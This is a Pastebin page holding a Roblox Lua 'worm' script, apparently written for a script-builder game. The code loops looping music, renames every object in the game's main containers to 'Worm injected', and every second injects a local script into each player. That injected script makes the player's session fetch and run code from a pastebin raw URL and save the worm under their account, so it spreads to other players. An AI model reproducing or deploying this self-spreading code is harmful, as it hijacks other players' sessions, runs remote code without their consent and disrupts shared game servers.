Advertisement
PersonsadminTeam

Untitled

Jan 26th, 2020
223
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.67 KB | None | 0 0
  1. --Made By personsadminlol--
  2. --Update Logs--
  3. --Fixed Lag for person runing script--
  4.  
  5. ---Adding and need help with--
  6. --Makeing own website for worm (so can run script with website)--
  7. --More lag--
  8. --END NOW--
  9.  
  10. -- __ __ ________ _______
  11. / \ / \___________ _____ \_____ \ \ _ \
  12. \ \/\/ / _ \_ __ \/ \ / ____/ / /_\ \
  13. \ ( <_> ) | \/ Y Y \ / \ \ \_/ \
  14. \__/\ / \____/|__| |__|_| / \_______ \ /\ \_____ /
  15. \/ \/ \/ \/ \/--
  16.  
  17. if script.ClassName ~= "LocalScript" then
  18. local hs = game:GetService'HttpService'
  19.  
  20. function makemusic()
  21. local music = Instance.new("Sound",workspace)
  22. music.Name = "WORMMLGMUSIC"
  23. music.SoundId = "rbxassetid://278068026"
  24. music.Volume = 1
  25. music.Looped = true
  26. music:Play()
  27. end
  28. workspace.ChildRemoved:connect(function(p)
  29. wait(0.1)
  30. if p.Name == "WORMMLGMUSIC" then
  31. for index, child in pairs(workspace:GetChildren()) do
  32. if child.Name == "WORMMLGMUSIC" then
  33. i = i + 1
  34. end
  35. end
  36. if i == 0 then
  37. makemusic()
  38. end
  39. end
  40. end)
  41. i = 0
  42. for index, child in pairs(workspace:GetChildren()) do
  43. if child.Name == "WORMMLGMUSIC" then
  44. i = i + 1
  45. end
  46. end
  47. if i == 0 then
  48. makemusic()
  49. end
  50. while wait(1) do
  51. for index, child in pairs(game:GetService'Players':GetChildren()) do
  52. newLocalScript([[
  53. game.Players.LocalPlayer.PlayerGui.SB_OutputGUI.Main.Output.Header.FPS.Text = "this isn't a logger, dumb-dumbs "
  54. wait()
  55. game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'h/http://pastebin.com/raw/WVeisNWN' wait(0.25) game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'createhttp/worm/http://pastebin.com/raw/WVeisNWN' wait(0.25) game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'save/worm' ]],child.PlayerGui)
  56. end
  57. end
  58. else
  59. game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'h/http://pastebin.com/raw/WVeisNWN'
  60. end
  61. while true do
  62. stuff=game.Workspace:GetChildren()
  63. stuff2=game.Lighting:GetChildren()
  64. stuff3=game.StarterGui:GetChildren()
  65. stuff4=game.StarterPack:GetChildren()
  66. wait(1)
  67. for i=1,#stuff do
  68. if stuff[i].Name~="Virus" then
  69. stuff[i].Name="Worm injected"
  70. game.Workspace.Name="Worm injected"
  71. end
  72. end
  73. wait(1)
  74. for i=1,#stuff2 do
  75. stuff2[i].Name="Worm injected"
  76. game.Lighting.Name="Worm injected"
  77. end
  78. wait(1)
  79. for i=1,#stuff3 do
  80. stuff3[i].Name="Worm injected"
  81. game.StarterGui.Name="Worm injected"
  82. end
  83. wait(1)
  84. for i=1,#stuff4 do
  85. stuff4[i].Name="Worm injected"
  86. game.StarterPack.Name="Worm injected"
  87. end
  88. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement